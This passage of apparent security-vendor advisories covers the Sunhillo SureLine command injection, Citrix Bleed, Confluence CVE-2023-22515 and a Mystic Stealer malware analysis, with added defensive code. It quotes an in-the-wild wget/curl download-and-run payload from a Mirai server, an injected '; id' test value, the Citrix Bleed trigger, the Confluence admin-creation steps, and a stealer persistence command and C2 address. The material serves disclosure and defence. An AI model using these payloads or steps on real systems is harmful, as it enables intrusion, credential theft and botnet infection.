  • Impact of this vulnerability on data confidentiality is high.
  • Impact of this vulnerability on data integrity is high.
  • Impact of this vulnerability on data availability is high.

Technical Overview

Sunhillo SureLine versions before 8.7.0.1.1 contain an unauthenticated OS command injection vulnerability through the ipAddr or dnsAddr parameters within the networkDiag.cgi script.
This script allows user-provided data to be directly inserted into a shell command via ipAddr or dnsAddr parameters. This makes it possible for an attacker to influence the command’s behavior by injecting valid OS command inputs.

Triggering the Vulnerability

To trigger the vulnerability, an attacker sends a specially crafted POST request to the web server at the URL /cgi/networkDiag.cgi. Within this request, the attacker inserts a Linux command into the ipAddr or dnsAddr POST parameter. When the web server processes the POST request, the command inserted into the parameter is executed. The lack of authentication makes this vulnerability easier to exploit.
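The input validation the networkDiag.cgi script lacks, as an added Python example (not Sunhillo's code; the function names and the ping command are assumptions standing in for whatever diagnostic the CGI runs): the first function shows the string-interpolation defect the write-up describes, the second accepts the parameter only if it parses as an IP address or hostname and then passes it as a separate argv element so no shell ever interprets it, and the last is a log-review heuristic that flags a diagnostic parameter carrying shell metacharacters.

```python
import ipaddress
import re
from typing import List

# RFC 1123 style hostname: labels of letters, digits and hyphens joined by dots.
HOSTNAME_RE = re.compile(
    r"^(?=.{1,253}$)[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
    r"(?:\.[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?)*$")
SHELL_META = set(";|&`$()<>{}\n\r'\"\\ \t")


def vulnerable_diag_command(ip_addr: str) -> str:
    """The defect pattern: the parameter is spliced into a shell command
    string. Returned only so the effect is visible; never executed here."""
    return f"ping -c 3 {ip_addr}"


def is_valid_target(value: str) -> bool:
    """Accept only something a network diagnostic could legitimately act on."""
    try:
        ipaddress.ip_address(value)
        return True
    except ValueError:
        return HOSTNAME_RE.match(value) is not None


def safe_diag_argv(ip_addr: str) -> List[str]:
    """Hardened version: validate, then build an argv list. Handing this list
    to subprocess.run without shell=True means ';', '|' and friends are just
    characters inside one argument, not command separators."""
    if not is_valid_target(ip_addr):
        raise ValueError(f"rejected diagnostic target {ip_addr!r}")
    return ["ping", "-c", "3", ip_addr]


def looks_like_injection(value: str) -> bool:
    """Log-review heuristic: a value that is neither an address nor a hostname
    and carries shell metacharacters."""
    return not is_valid_target(value) and any(c in SHELL_META for c in value)


if __name__ == "__main__":
    # Constructed parameter values: one legitimate, one with an appended command.
    for value in ("192.0.2.10", "192.0.2.10; id"):
        print(repr(value), "->", vulnerable_diag_command(value),
              "| valid:", is_valid_target(value),
              "| injection:", looks_like_injection(value))
```

The allow-list check is the real fix; the argv form is the second layer that holds even if a future code path forgets to call it, and the heuristic is what an IPS signature such as the one listed below approximates at the network edge.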

Exploitation

The following POST request demonstrates how the vulnerability is being exploited in the wild:

The POST request carries a malicious payload designed to exploit the vulnerability. It attempts to download a script "l.sh" from the remote server "194.180.48.100" to the "/tmp" directory on the target system using both "wget" and "curl". After downloading the script, it is executed using the "sh" command. Let’s break down the payload:

  • cd /tmp: Changes the current directory to "/tmp."
  • wget httpx://194.180.48.100/l.sh: Downloads the "l.sh" script from the specified URL.
  • curl -O httpx://194.180.48.100/l.sh: Downloads the "l.sh" script using "curl" with the "-O" option.
  • sh l.sh: Executes the downloaded "l.sh" script using the "sh" command.

Looking up the attacker-controlled server on VirusTotal, we see that the URL (Figure 1) and the script l.sh (Figure 2) are marked as malicious and are used by the Mirai botnet.

Figure 1

Figure 2

Mirai is malware that built a large botnet of Linux-based networked devices, turning them into remotely controlled bots that can be used for large-scale network attacks. It primarily targets consumer devices such as IP cameras and home routers.

SonicWall Protections

To ensure SonicWall customers are prepared for any exploitation that may occur due to this vulnerability, the following signature has been released:

  • IPS 15931: Sunhillo SureLine Command Injection

Threat Graph

Recent indications of increased signature hits point to an ongoing exploitation of this vulnerability in real-world scenarios. It appears that the Mirai botnet has expanded its scope to target vulnerable Sunhillo devices for the distribution of malware.

IOCs

  • SHA256: c8cf29e56760c50fa815a0c1c14c17641f01b9c6a4aed3e0517e2ca722238f63 (l.sh)
  • Known Malicious C2: 194.180.48.100

Remediation Recommendations

To mitigate this vulnerability, it is strongly recommended to update Sunhillo SureLine devices to at least version 8.7.0.1.1. This update will address the security issue and improve the overall system’s resilience against such exploits.

Relevant Links

https://nvd.nist.gov/vuln/detail/CVE-2021-36380
https://research.nccgroup.com/2021/07/26/technical-advisory-sunhillo-sureline-unauthenticated-os-command-injection-cve-2021-36380/

Citrix Bleed: Leaking Session Tokens Vulnerability

Overview

SonicWall Capture Labs Threat Research Team became aware of the threat Citrix Bleed, assessed its impact and developed mitigation measures for the vulnerability.

Citrix NetScaler is an Application Delivery Controller (ADC) and load balancer designed to enhance the performance and security of web-based applications. Produced by Citrix Systems, NetScaler ensures the swift, reliable and secure delivery of applications to devices everywhere. It combines advanced traffic management, application security, content switching and optimization features in one platform.

Citrix NetScaler, encompassing both ADC and NetScaler Gateway, recently came under scrutiny for a vulnerability identified as CVE-2023-4966. As of October 18th, CISA has reported active exploitation of this vulnerability. This flaw pertains to a sensitive information disclosure that can occur when the system is set up as a Gateway (encompassing VPN virtual server, ICA Proxy, CVPN, RDP Proxy) or an AAA “virtual” server. Notably, the vulnerability corresponds to CWE-119, which is described as “improper restriction of operations within the bounds of a memory buffer”. In some configurations, the sensitive information disclosed can include a valid session token.

The affected versions are:
  • NetScaler ADC and NetScaler Gateway 14.1 before 14.1-8.50
  • NetScaler ADC and NetScaler Gateway 13.1 before 13.1-49.15
  • NetScaler ADC and NetScaler Gateway 13.0 before 13.0-92.19
  • NetScaler ADC 13.1-FIPS before 13.1-37.164
  • NetScaler ADC 12.1-FIPS before 12.1-55.300
  • NetScaler ADC 12.1-NDcPP before 12.1-55.300

This vulnerability has been patched by Citrix on October 10th and can be mitigated by upgrading to the latest version of NetScaler.

CVE Details

This vulnerability has been assigned the Common Vulnerabilities and Exposures (CVE) identifier CVE-2023-4966.

The overall CVSS score is 9.4 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:L/E:X/RL:X/RC:X).

Base score is 9.4 (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:L), based on the following metrics:
  • Attack vector is network.
  • Attack complexity is low.
  • Privileges required is none.
  • User interaction is none.
  • Scope is unchanged.
  • Impact of this vulnerability on data confidentiality is high.
  • Impact of this vulnerability on data integrity is high.
  • Impact of this vulnerability on data availability is low.

Temporal score is N/A (E:X/RL:X/RC:X), based on the following metrics:
  • The exploit code maturity level of this vulnerability is Not Defined.
  • The remediation level of this vulnerability is Not Defined.
  • The report confidence level of this vulnerability is Not Defined.

Technical Overview

To pinpoint the vulnerability, a comparative analysis was conducted between two versions of the software: the older 13.1-48.47 and the newer 13.1-49.15. Examining the differences between these versions let us identify the exact location of the patch and gain a deeper understanding of the vulnerability’s nature. Figure 1 shows the differences as displayed by the tool BinDiff.

Figure 1

The ns_vpn_process_unauthenticated_request function builds and validates the URL /oauth/idp/.well-known/openid-configuration. Within its implementation there is a significant call to ns_aaa_oauth_send_openid_config, which uses the snprintf function as seen in Figure 2.

Figure 2

The primary role of this function is to format and populate the print_temp_rule buffer with a series of characters and values. The destination buffer is print_temp_rule, with a maximum size of 0x20000 bytes (128 KiB). The format string, a comprehensive JSON object shown in Figure 3, describes the OpenID Connect configuration.

Figure 3

The snprintf call seen in Figure 2 employs multiple %.*s format specifiers, each of which expects a length and a string as a pair of arguments. These specifiers fill in the various OAuth and OpenID Connect endpoints, with the base URL or domain taken from the variable host_string. Looking at the arguments in Figure 2: length is the length of host_string and ensures that at most length characters of host_string are printed; host_string is the base URL or domain substituted into the respective URLs in the JSON.

After this operation, not_size_buffer holds the number of characters that would have been written to print_temp_rule, excluding the terminating null byte, had there been no size limit. This is snprintf’s standard behavior: it returns the number of characters it intended to write, regardless of the size limit that may have truncated the actual write. Thus, not_size_buffer captures the length of the fully constructed JSON string.

This function’s design intricacies go beyond just formatting; there’s a security facet to it. Initially, the function would instantly send out the response. But in its patched form, a response is dispatched only if snprintf yields a value less than 0x20000.

There’s a vulnerability in how the return value of snprintf is used to determine how many bytes are sent to the client through ns_vpn_send_response. Contrary to what one might expect, snprintf doesn’t return the number of bytes it actually writes to the buffer. Instead, it returns the number it would have written if the buffer was large enough. This is where the security risk comes into play. The return value is being incorrectly used as the number of bytes written to the buffer.
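The following C program is an added illustration of that return-value misuse; it is not NetScaler code and the format string, function names and the 256-byte buffer (standing in for the 0x20000-byte print_temp_rule) are constructed for the example. It places the pre-patch pattern, which passes snprintf's result straight through as the number of bytes to send, beside the patched pattern, which refuses to respond unless the formatted length fits the buffer.

```c
#include <stdio.h>
#include <string.h>

/* Added illustration, not NetScaler code: a scaled-down model of the
 * snprintf return-value misuse described above. The 0x20000-byte
 * print_temp_rule buffer becomes 256 bytes so the overrun is easy to see. */
#define BUF_SIZE 256

/* Constructed stand-in for the OpenID Connect configuration format string.
 * The host is inserted through several %.*s pairs, which is why a long
 * Host header multiplies into a response far larger than the buffer. */
#define OPENID_FMT                                                      \
    "{\"issuer\":\"https://%.*s\","                                      \
    "\"authorization_endpoint\":\"https://%.*s/oauth/idp/authorize\","   \
    "\"token_endpoint\":\"https://%.*s/oauth/idp/token\","               \
    "\"jwks_uri\":\"https://%.*s/oauth/idp/certs\"}"

/* Shared formatting step; returns what snprintf returns: the length the
 * complete string would have, not the number of bytes actually stored. */
static int format_config(char *buf, size_t buflen, const char *host, int hostlen)
{
    return snprintf(buf, buflen, OPENID_FMT,
                    hostlen, host, hostlen, host, hostlen, host, hostlen, host);
}

/* Vulnerable pattern (pre-patch): the snprintf result is handed straight to
 * the send routine as the number of bytes in buf. Once it exceeds buflen the
 * caller transmits whatever memory follows the buffer. */
int response_len_vulnerable(char *buf, size_t buflen, const char *host, int hostlen)
{
    return format_config(buf, buflen, host, hostlen);
}

/* Patched pattern: respond only if the formatted length fits the buffer;
 * a truncated result yields -1 and nothing is sent. */
int response_len_fixed(char *buf, size_t buflen, const char *host, int hostlen)
{
    int n = format_config(buf, buflen, host, hostlen);
    if (n < 0 || (size_t)n >= buflen)
        return -1;
    return n;
}

/* Builds a constructed host of `hostlen` repeated 'a' characters and returns
 * the send length the chosen variant would use (fixed != 0 selects the patch). */
int run_case(int hostlen, int fixed)
{
    static char host[4096];
    char buf[BUF_SIZE];

    if (hostlen < 0 || hostlen >= (int)sizeof host)
        return -2;
    memset(host, 'a', (size_t)hostlen);
    host[hostlen] = '\0';
    return fixed ? response_len_fixed(buf, sizeof buf, host, hostlen)
                 : response_len_vulnerable(buf, sizeof buf, host, hostlen);
}

int main(void)
{
    printf("buffer %d bytes\n", BUF_SIZE);
    printf("short host: vulnerable sends %d, fixed sends %d\n",
           run_case(10, 0), run_case(10, 1));
    printf("long host : vulnerable sends %d, fixed returns %d\n",
           run_case(300, 0), run_case(300, 1));
    return 0;
}
```

With a short host both variants agree; with a host longer than the buffer can hold, the vulnerable variant reports a send length several times BUF_SIZE while the fixed variant returns -1. The same check, `n >= buflen` after every snprintf whose result feeds a length, is what to look for when auditing code of this shape.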

Triggering the Vulnerability

  • The target must be running NetScaler Citrix firmware prior to version 13.1-49.15.
  • The attacker must have network access to the vulnerable software.
  • A GET request is sent to the endpoint /oauth/idp/.well-known/openid-configuration with a Host header consisting of a single character (for example ‘a’) repeated 24,576 times.

Exploitation

To exploit this vulnerability, the attacker’s goal is to generate a response that exceeds the buffer size of 0x20000 bytes. If successful, the application sends not only the filled buffer but also the memory following the print_temp_rule buffer, potentially exposing sensitive data or causing other unexpected issues. Proof of concept code has been published and active exploitation of this vulnerability was reported by CISA on October 18th. Included in the leaked information, depending on the appliance’s configuration, is a 65-byte hex string that is a valid session cookie. As a result, an attacker can use this session token to impersonate an active user.

SonicWall Protections

To ensure SonicWall customers are prepared for any exploitation that may occur due to this vulnerability, the following signatures have been released:

  • IPS:4130 NetScaler ADC/Gateway Information Disclosure

Threat Graph

SonicWall sensors have confirmed a spike in exploitation attempts against this vulnerability and may see an even bigger surge in the coming days.

Figure 4: SonicWall signature hits data (Updated 12/20/23)

Remediation Recommendations

The risks posed by this vulnerability can be mitigated or eliminated by:
  • Applying the vendor-supplied patch to eliminate this vulnerability.
  • Utilizing up-to-date IPS signatures to filter network traffic.
  • Alternatively, consider taking the server offline.

Relevant Links

  • CVE-2023-4966
  • CNA CVSS Metrics
  • Vendor Advisory
  • Citrix Bleed
  • Public POC

Atlassian Confluence Data Center and Server Broken Access Control Vulnerability

Overview

The SonicWall Capture Labs Threat Research team has observed attackers targeting a critical vulnerability affecting on-premises instances of Confluence Server and Confluence Data Center that allows unauthorized users to gain administrative-level privileges by creating unauthorized Confluence administrator accounts. The vulnerability is categorized as a Broken Access Control issue and has a CVSS base score of 10.0. CISA has warned that malicious actors exploited CVE-2023-22515 as a zero-day to obtain access to victim systems. Atlassian initially described this vulnerability as Privilege Escalation but later categorized it as Broken Access Control and released an advisory on October 4th, 2023 for CVE-2023-22515. The vendor has classified this vulnerability as Broken Authentication and Session Management (BASM). Atlassian Cloud sites are not affected by this vulnerability. Vulnerable software versions include 8.0.0-8.0.3, 8.1.0, 8.1.3-4, 8.2.0-8.2.3, 8.3.0-8.3.2, 8.4.0-8.4.2, 8.5.0-1.

CVE Details

This vulnerability has been assigned the Common Vulnerabilities and Exposures (CVE) identifier CVE-2023-22515.

The overall CVSS score is 10.0 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:O/RC:C).

The base score is 10 (AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H), based on the following metrics:

  • Attack vector is network.
  • Attack complexity is low.
  • Privileges required is none.
  • User interaction is none.
  • Scope is changed.
  • Impact of this vulnerability on data confidentiality is high.
  • Impact of this vulnerability on data integrity is high.
  • Impact of this vulnerability on data availability is high.

Temporal score is 9.4 (E:P/RL:O/RC:C), based on the following metrics:

  • The exploit code maturity level of this vulnerability is proof of concept code.
  • The remediation level of this vulnerability is official fix.
  • The report confidence level of this vulnerability is confirmed.

Technical Overview

Atlassian Confluence Data Center is a self-managed edition of Confluence, built to support organizations’ size, complexity and governance needs.

To trigger the vulnerability, an unauthenticated attacker modifies the Confluence server’s configuration to indicate that setup is not complete and then uses the /setup/setupadministrator.action endpoint to create a new administrator user. The configuration change is made with a single request to the /server-info.action endpoint.

Exploitation

CVE-2023-22515 can be exploited in a series of steps. The following steps demonstrate how RCE is obtained on Atlassian Crowd:

Before manipulating the parameters let us first observe a basic login request.

Next, we can trick the server into believing the configuration hasn’t been completed by setting “applicationConfig.setupComplete” to false.

Once the server believes setup is not complete, we can use setupadministrator.action to create an administrative-level account, passing the desired username and password.

As a result of the last request, the attacker has created a new account that permits a successful login with the attacker’s credentials.


SonicWall Protections

To ensure SonicWall customers are prepared for any exploitation that may occur due to this vulnerability, the following signatures have been released:
  • IPS:15926 – Confluence Data Center and Server Privilege Escalation
  • IPS:19383 – Confluence Data Center and Server Privilege Escalation 2
  • IPS:19382 – Confluence Data Center and Server Privilege Escalation 3

Threat Graphs

SonicWall sensors have confirmed active exploitation of this vulnerability. The graph below indicates an increasing number of exploitation attempts over the last 40 days:

Remediation Recommendations

Admins still running one of the vulnerable software versions should upgrade Confluence Data Center and Confluence Server to version 8.3.3 or later, 8.4.3 or later, or 8.5.2 or later.

If that is not possible, users can mitigate the issue by blocking access to the /setup/* endpoints on Confluence instances. Further mitigation steps are described in the vendor’s official advisory.
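As an added example, not Atlassian or SonicWall code, the C program below turns the two-step sequence from the exploitation walkthrough and the /setup/* blocking advice into a classifier for web-server access-log lines. It flags a request to /server-info.action that sets applicationConfig.setupComplete to false, a request to /setup/setupadministrator.action, and any other /setup/ path. The log lines, client addresses and the /setup/example.action path are constructed for the example.

```c
#include <stdio.h>
#include <string.h>

/* Added example, not Atlassian or SonicWall code: classifies web-server
 * access-log lines by the request shapes used in the walkthrough above and
 * the /setup/* paths the remediation advice says to block. All log lines
 * here are constructed; 203.0.113.0/24 and 198.51.100.0/24 are
 * documentation address ranges. */

enum {
    IND_SETUP_COMPLETE_FALSE = 1, /* /server-info.action flipping applicationConfig.setupComplete */
    IND_SETUP_ADMIN          = 2, /* /setup/setupadministrator.action */
    IND_SETUP_PATH           = 4  /* any other /setup/* path */
};

/* Copy the request target (path plus query) out of a Common Log Format line:
 * the token after the method inside the first quoted field. Returns 0 if the
 * line carries no request line. */
static int request_target(const char *line, char *out, size_t outlen)
{
    const char *quote = strchr(line, '"');
    if (!quote) return 0;
    const char *method_end = strchr(quote + 1, ' ');
    if (!method_end) return 0;
    const char *start = method_end + 1;
    const char *end = strchr(start, ' ');          /* before "HTTP/1.x" */
    if (!end) end = strchr(start, '"');
    if (!end) return 0;
    size_t n = (size_t)(end - start);
    if (n >= outlen) n = outlen - 1;
    memcpy(out, start, n);
    out[n] = '\0';
    return 1;
}

/* Returns a bitmask of IND_* indicators present in one log line. */
int classify_log_line(const char *line)
{
    char target[512];
    int flags = 0;
    if (!request_target(line, target, sizeof target)) return 0;

    char *query = strchr(target, '?');
    if (query) *query++ = '\0';                    /* split path from query */

    if (strcmp(target, "/server-info.action") == 0 && query &&
        strstr(query, "applicationConfig.setupComplete=false"))
        flags |= IND_SETUP_COMPLETE_FALSE;

    if (strcmp(target, "/setup/setupadministrator.action") == 0)
        flags |= IND_SETUP_ADMIN;
    else if (strncmp(target, "/setup/", 7) == 0)
        flags |= IND_SETUP_PATH;

    return flags;
}

/* Constructed sample: a normal login, then the two-step sequence, then a
 * blocked request to a placeholder /setup/ page. */
const char *SAMPLE_LOG[] = {
    "203.0.113.7 - - [04/Oct/2023:10:00:01 +0000] \"GET /login.action HTTP/1.1\" 200 5120",
    "203.0.113.7 - - [04/Oct/2023:10:00:05 +0000] \"GET /server-info.action?applicationConfig.setupComplete=false HTTP/1.1\" 302 0",
    "203.0.113.7 - - [04/Oct/2023:10:00:09 +0000] \"POST /setup/setupadministrator.action HTTP/1.1\" 302 0",
    "198.51.100.2 - - [04/Oct/2023:11:30:00 +0000] \"GET /setup/example.action HTTP/1.1\" 403 0",
};
const int SAMPLE_LOG_COUNT = (int)(sizeof SAMPLE_LOG / sizeof SAMPLE_LOG[0]);

/* Number of sample lines that carry at least one indicator. */
int count_flagged(void)
{
    int hits = 0;
    for (int i = 0; i < SAMPLE_LOG_COUNT; i++)
        if (classify_log_line(SAMPLE_LOG[i])) hits++;
    return hits;
}

int main(void)
{
    for (int i = 0; i < SAMPLE_LOG_COUNT; i++)
        printf("line %d: indicators 0x%x\n", i, classify_log_line(SAMPLE_LOG[i]));
    printf("%d of %d lines flagged\n", count_flagged(), SAMPLE_LOG_COUNT);
    return 0;
}
```

The first indicator followed shortly by the second from the same client is the sequence described above; on a patched or already-set-up instance, any hit on the third indicator is a good reason to confirm that the /setup/* block is in place.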

Relevant Links

Mystic Stealer Uses Trickery To Steal Data

This week, the SonicWall Capture Labs Research Team looked at a sample of Mystic Stealer. This is an infostealer that first appeared earlier in 2023. It has a variety of defensive techniques to evade detection and hamper analysis, and is coded to steal a variety of information (including Steam credentials). Mystic uses geolocation, installed languages, and local time to ensure the malware is on a viable victim system.

Static Analysis

The main sample (md5:b8afb88f471cf88b67db6a39ff4053e3) has several points to note. In Figure 1, there is no packer or protector listed in the initial detection; however, the creation timestamp is very recent. There are two atypical sections listed: .inter and .00cfg (Figure 2). There is also a unique .pdb file referenced in Figure 3.

Figure 1: Initial sample detection

Figure 2: Abnormal PE file sections

Figure 3: Timestamp for the debugger is extremely recent

Looking at the file in a debugger, it is immediately apparent that this program was created to hamper analysis (Figure 4). Every single step immediately preceding the entry point is a jump to a function that will perform multiple checks against the system. These include:

  • Location: GetLocaleInfoW, IsValidLocaleName, GetUserDefaultLCID, LCIDToLocaleName, GetSystemTimeAsFileTime, EnumSystemLocalesW
  • Virtual Machine/Debugger: IsProcessorFeaturePresent, IsDebuggerPresent, OutputDebugString, QueryPerformanceCounter, QueryPerformanceFrequency, GetProcessHeap, GetCurrentProcessId, GetCurrentThreadId

Figure 4: Obfuscation by jump instructions

Within many functions, ‘call-push-ret’ is used as a way of invoking system APIs indirectly (Figure 5). Once the locale check has been cleared, only debug and VM checks are performed, and only intermittently.

Figure 5: A known method of obfuscation is using ‘call-push-ret’

The program is also capable of setting its own sleep and wake conditions as shown in Figure 6, further enabling the malware to evade system defenses.

Figure 6: Dynamic sleep conditions and virtual machine checks

Dynamic Analysis

Running the sample without any patching results in an immediate error and the program terminates. The first round of checks to bypass are location and debugging protections, followed by intermittent virtual machine checks. At this point, the file will access the ‘.inter’ section at memory location 0xD80000. Manually running the next function will create a new PE file in the newly available space, as seen below in Figure 7.

Figure 7: A new executable is written to the ‘.inter’ section

Once this new program has been written, the command to run ‘AppLaunch’ is written to memory and executed (Figure 8). AppLaunch is a .NET application that is used by the malware for process injection.

Figure 8: The command ‘C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe’ is written immediately before launch

Once AppLaunch runs and the payload is injected, enumeration of the system will occur as well as an initial attempt to send data to the C2 server. Pulling strings from runtime memory of ‘AppLaunch’ shows that the injected payload is looking for analysis software.

Figure 9: Strings for known analysis tools IDA, Scylla, Immunity, x32/64dbg

A file is written to ‘~\AppData\Local\Temp’ as seen below in Figure 10. The name is hard-coded (4375vtb45tv8225nv4285n2.txt), and subsequent runs will create a file with the same name.

Figure 10: A file is written to ‘~\AppData\Local\Temp’ when malware is successfully run

The contents of the file show an IP address that is unsuccessfully contacted (Figure 11). This happens regardless of network connectivity, which means at the present time the IP is down or is not accepting communications. This IP is based out of Russia (Figure 12).

Figure 11: Log contents from written temp file

Figure 12: IP data


A packet capture shows what was sent to the malicious IP. The data is base64 encoded but contains basic information about the system. A partial capture is below in Figure 13.

Figure 13: The ASCII plaintext has a ‘hwid’ indicating the encoded system name

The full decoded message reads:

Sent system information
computername
SOFTWARE\Microsoft\Windows NT\CurrentVersion
UserName:
ScreenSize:
Current language:
Operation System:
Hardwares:
IP: {ip}
File Location:
Available KeyboardLayouts:
ProductName
SystemInformation.txt
Country: {country}
Location: {location}
Zip code: {zipcode}
TimeZone: {timezone}
HWID

Extracting the injected payload from memory, it is another PE file that has no import or export table, no listed functions, and the debug timestamp is set in the future (Dec 3, 2023) as seen in Figure 14. There are a handful of plaintext strings that show some capabilities in Figure 14 but, given that the import table doesn’t (visibly) exist, it is difficult to determine exact functions.

Figure 14: The payload has no visible imports, exports, or functions. The debug timestamp is also from the future.

The listed strings show that the program can enumerate through files and running processes, but there are no file paths or application names found.

Figure 15: Visible strings give an idea of capabilities

In a debugger, the payload has functions that not only continuously check the system for analysis tools but also terminate the process if any of those checks fail (Figure 16). Each function also references the same items, ‘LdrpInitializeProcess’ and ‘minkernel\\ntdll\\ldrinit.c’. After bypassing these evasion checks, several decoding functions were found.

Figure 16: Each green arrow represents a decision tree where the program can terminate

Using several methods to decode the data resulted in a complete dump of all commands. Figure 17 has a partial listing of what is enumerated by the malware, with a complete listing below.

Figure 17: Partial list of decoded commands

Dynamic imports (decoded):

  • Ole32.dll
  • User32.dll
  • Ntdll.dll
  • Gdi32.dll
  • Wininet.dll
  • Crypt32.dll
  • Gdiplus.dll
  • Shlwapi.dll
  • Kernel32.dll
  • Advapi32.dll
  • Rstrtmgr.dll

Data marked for extraction:

  • Chromium-based browsers
  • Chromium browser extensions
  • Chromium wallets
  • Gecko-based browser data
  • Gecko browser extensions
  • Web history
  • Saved credit card data
  • Autofill information
  • Cookies (chromium, mozilla)
  • Saved logins
  • Steam installation data
  • Telegram
  • Outlook (SMTP, POP, IMAP, HTTP credentials and addresses)
  • User tokens
  • Screenshots are taken during enumeration

Mystic creates persistence with a scheduled task using the command ‘/c schtasks /create /F /sc minute /mo 15 /tr “%ls” /tn “\WindowsAppPool\%ls”‘.
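The persistence command is the most directly huntable artifact in this write-up. The C program below is an added example, not code from the sample or from SonicWall: it tokenizes a schtasks command line (honouring double quotes), pulls out the /sc, /mo, /tn and /tr values, and flags a minute-interval task registered under \WindowsAppPool\, which is the shape of the command quoted above. The executable path, task name and benign comparison command are constructed placeholders standing in for the %ls values.

```c
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <ctype.h>

/* Added example, not from the sample or SonicWall: a hunting check for the
 * scheduled-task persistence command quoted above. Paths and task names in
 * the samples are constructed placeholders standing in for the %ls values. */

#define MAX_TOKENS 32
#define MAX_TOKEN  260

struct sched_task {
    int  is_create;             /* /create seen */
    char sc[16];                /* /sc value, e.g. minute */
    int  modifier;              /* /mo value */
    char task_name[MAX_TOKEN];  /* /tn value */
    char task_run[MAX_TOKEN];   /* /tr value */
};

/* Split on whitespace; "..." becomes one token with the quotes stripped. */
static int tokenize(const char *cmd, char tokens[][MAX_TOKEN], int max)
{
    int n = 0;
    while (*cmd && n < max) {
        while (*cmd && isspace((unsigned char)*cmd)) cmd++;
        if (!*cmd) break;
        int i = 0;
        if (*cmd == '"') {
            cmd++;
            while (*cmd && *cmd != '"' && i < MAX_TOKEN - 1) tokens[n][i++] = *cmd++;
            if (*cmd == '"') cmd++;
        } else {
            while (*cmd && !isspace((unsigned char)*cmd) && i < MAX_TOKEN - 1)
                tokens[n][i++] = *cmd++;
        }
        tokens[n][i] = '\0';
        n++;
    }
    return n;
}

/* Case-insensitive string equality (schtasks switches are case-insensitive). */
static int ieq(const char *a, const char *b)
{
    for (; *a && *b; a++, b++)
        if (tolower((unsigned char)*a) != tolower((unsigned char)*b)) return 0;
    return *a == *b;
}

/* Parse a command line into t; returns 1 when it is a schtasks /create call. */
int parse_schtasks(const char *cmd, struct sched_task *t)
{
    char tok[MAX_TOKENS][MAX_TOKEN];
    int n = tokenize(cmd, tok, MAX_TOKENS);
    int seen_schtasks = 0;

    memset(t, 0, sizeof *t);
    for (int i = 0; i < n; i++) {
        if (ieq(tok[i], "schtasks") || ieq(tok[i], "schtasks.exe")) seen_schtasks = 1;
        else if (ieq(tok[i], "/create")) t->is_create = 1;
        else if (i + 1 < n && ieq(tok[i], "/sc")) strncpy(t->sc, tok[++i], sizeof t->sc - 1);
        else if (i + 1 < n && ieq(tok[i], "/mo")) t->modifier = atoi(tok[++i]);
        else if (i + 1 < n && ieq(tok[i], "/tn")) strncpy(t->task_name, tok[++i], MAX_TOKEN - 1);
        else if (i + 1 < n && ieq(tok[i], "/tr")) strncpy(t->task_run, tok[++i], MAX_TOKEN - 1);
    }
    return seen_schtasks && t->is_create;
}

/* Interval in minutes for a minute-scheduled task, or -1 if not applicable. */
int interval_minutes(const char *cmd)
{
    struct sched_task t;
    if (!parse_schtasks(cmd, &t) || !ieq(t.sc, "minute")) return -1;
    return t.modifier;
}

/* 1 when the command matches the Mystic persistence shape: a task under
 * \WindowsAppPool\ that re-runs at an interval of 15 minutes or less. */
int is_mystic_persistence(const char *cmd)
{
    struct sched_task t;
    const char *prefix = "\\WindowsAppPool\\";
    if (!parse_schtasks(cmd, &t)) return 0;
    return ieq(t.sc, "minute") && t.modifier > 0 && t.modifier <= 15 &&
           strncmp(t.task_name, prefix, strlen(prefix)) == 0;
}

/* Constructed samples: the observed shape with placeholder values, and a benign task. */
const char *MYSTIC_CMD =
    "cmd.exe /c schtasks /create /F /sc minute /mo 15 "
    "/tr \"C:\\Users\\victim\\AppData\\Roaming\\placeholder.exe\" /tn \"\\WindowsAppPool\\placeholder\"";
const char *BENIGN_CMD =
    "schtasks /create /sc daily /st 02:00 /tr \"C:\\Tools\\backup.exe\" /tn \"\\Example\\NightlyBackup\"";

int main(void)
{
    printf("mystic sample: flagged=%d interval=%d\n",
           is_mystic_persistence(MYSTIC_CMD), interval_minutes(MYSTIC_CMD));
    printf("benign sample: flagged=%d interval=%d\n",
           is_mystic_persistence(BENIGN_CMD), interval_minutes(BENIGN_CMD));
    return 0;
}
```

The same parser can be pointed at process-creation telemetry (command lines of schtasks.exe children of cmd.exe) to surface the task before it fires; the \WindowsAppPool\ folder is the high-confidence part of the match, while the 15-minute interval alone is too common to alert on by itself.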

Mystic Stealer is highly evasive and can easily exfiltrate a large amount of data very quickly. These samples are detected by the following signatures: MysticStealer.Dropper, MysticStealer.Payload

IOCs

Main sample
md5: b8afb88f471cf88b67db6a39ff4053e3
sha1: 1c3c992f74a7905af067ef49657537e71be67413
sha256: 6ba71b02669ff6b6e939e334fd5b2aa907bfd3f54215c19df094be1cd5b948f8

Payload
md5: 4DF77A52DCE196CD2B3EE22A4E5A10B4
sha1: A9EB223D5A63592470723379CD975720895BEA47
sha256: BBDFF99D02941D59512389B4D6A43B0A23AF799A270204A6FF925BE550078A42

IP
hxxp://5.42.92[.]211/loghub/master

Mutex
\Sessions\1\BaseNamedObjects\Global\bbf55406-3d8f-4afd-a2ba-a73b2d5c73b4